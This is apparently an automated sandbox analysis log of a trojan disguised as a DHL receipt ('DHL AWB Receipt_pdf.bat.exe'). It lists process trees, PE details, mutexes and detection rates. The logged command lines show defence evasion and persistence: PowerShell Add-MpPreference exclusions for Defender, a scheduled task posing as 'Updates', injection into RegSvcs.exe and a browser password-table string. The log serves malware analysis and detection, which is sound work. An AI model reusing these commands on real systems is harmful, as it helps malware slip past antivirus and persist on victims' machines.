Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01796000	15_2_01796000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_017D02C0	15_2_017D02C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01750535	15_2_01750535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01750770	15_2_01750770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01774750	15_2_01774750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0174C7C0	15_2_0174C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0176C6E0	15_2_0176C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01766962	15_2_01766962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_017529A0	15_2_017529A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01752840	15_2_01752840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0175A840	15_2_0175A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0177E8F0	15_2_0177E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_017368B8	15_2_017368B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01788890	15_2_01788890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0174EA80	15_2_0174EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0175ED7A	15_2_0175ED7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0175AD00	15_2_0175AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0174ADE0	15_2_0174ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01758DC0	15_2_01758DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01768DBF	15_2_01768DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01750C00	15_2_01750C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01740CF2	15_2_01740CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_017C4F40	15_2_017C4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01770F30	15_2_01770F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01792F28	15_2_01792F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01742FC8	15_2_01742FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_017CEFA0	15_2_017CEFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01750E59	15_2_01750E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01762E90	15_2_01762E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0173F172	15_2_0173F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0178516C	15_2_0178516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0175B1B0	15_2_0175B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0173D34C	15_2_0173D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_017533F3	15_2_017533F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0176D2F0	15_2_0176D2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0176B2C0	15_2_0176B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_017552A0	15_2_017552A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01741460	15_2_01741460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_017974E0	15_2_017974E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01753497	15_2_01753497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0175B730	15_2_0175B730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01759950	15_2_01759950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0176B950	15_2_0176B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01755990	15_2_01755990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_017BD800	15_2_017BD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_017538E0	15_2_017538E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0178DBF9	15_2_0178DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_017C5BF0	15_2_017C5BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0176FB80	15_2_0176FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_017C3A6C	15_2_017C3A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01753D40	15_2_01753D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0176FDC0	15_2_0176FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_017C9C32	15_2_017C9C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01769C20	15_2_01769C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01751F92	15_2_01751F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_01759EB0	15_2_01759EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0042ED43	15_2_0042ED43

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 019E7E54 appears 111 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01A1F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01797E54 appears 97 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01A0EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 019D5130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 017BEA12 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0198B970 appears 280 times

Source: DHL AWB Receipt_pdf.bat.exe

Static PE information: invalid certificate

Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.2171588795.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs DHL AWB Receipt_pdf.bat.exe
Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.2197538242.000000000AA40000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs DHL AWB Receipt_pdf.bat.exe
Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.2170293321.000000000150E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs DHL AWB Receipt_pdf.bat.exe
Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.2195403511.000000000A1F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs DHL AWB Receipt_pdf.bat.exe
Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.2171588795.000000000342C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs DHL AWB Receipt_pdf.bat.exe
Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.2176885022.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs DHL AWB Receipt_pdf.bat.exe
Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000002.2195819761.000000000A315000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameschtasks.exej% vs DHL AWB Receipt_pdf.bat.exe
Source: DHL AWB Receipt_pdf.bat.exe, 00000000.00000000.2104684702.0000000000FB6000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameiYAc.exe: vs DHL AWB Receipt_pdf.bat.exe
Source: DHL AWB Receipt_pdf.bat.exe	Binary or memory string: OriginalFilenameiYAc.exe: vs DHL AWB Receipt_pdf.bat.exe

Source: DHL AWB Receipt_pdf.bat.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: DHL AWB Receipt_pdf.bat.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: nlvpnyUnaRqfA.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: DHL AWB Receipt_pdf.bat.exe	Static PE information: Section: Y8QY(+(j ZLIB complexity 1.0003849909855769
Source: nlvpnyUnaRqfA.exe.0.dr	Static PE information: Section: Y8QY(+(j ZLIB complexity 1.0003849909855769

Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, mSqAlnyPPcc8wFepWt.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, mSqAlnyPPcc8wFepWt.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, mSqAlnyPPcc8wFepWt.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, P0fUmjLC55U0QEwxD9.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, P0fUmjLC55U0QEwxD9.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, P0fUmjLC55U0QEwxD9.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, P0fUmjLC55U0QEwxD9.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, mSqAlnyPPcc8wFepWt.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, mSqAlnyPPcc8wFepWt.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, mSqAlnyPPcc8wFepWt.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, mSqAlnyPPcc8wFepWt.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, mSqAlnyPPcc8wFepWt.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, mSqAlnyPPcc8wFepWt.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, P0fUmjLC55U0QEwxD9.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, P0fUmjLC55U0QEwxD9.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@23/16@16/10

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe

File created: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1308:120:WilError_03
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Mutant created: \Sessions\1\BaseNamedObjects\zjNjPTekSzHxeCPSyYmwUCYtq
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4092:120:WilError_03

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe

File created: C:\Users\user\AppData\Local\Temp\tmp44DF.tmp

Jump to behavior

Source: DHL AWB Receipt_pdf.bat.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: EhStorAuthn.exe, 00000011.00000002.4574054013.0000000002691000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4574054013.00000000026C6000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: DHL AWB Receipt_pdf.bat.exe	ReversingLabs: Detection: 47%
Source: DHL AWB Receipt_pdf.bat.exe	Virustotal: Detection: 51%

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe

File read: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nlvpnyUnaRqfA" /XML "C:\Users\user\AppData\Local\Temp\tmp44DF.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nlvpnyUnaRqfA" /XML "C:\Users\user\AppData\Local\Temp\tmp26E1.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	Process created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nlvpnyUnaRqfA" /XML "C:\Users\user\AppData\Local\Temp\tmp44DF.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nlvpnyUnaRqfA" /XML "C:\Users\user\AppData\Local\Temp\tmp26E1.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	Process created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
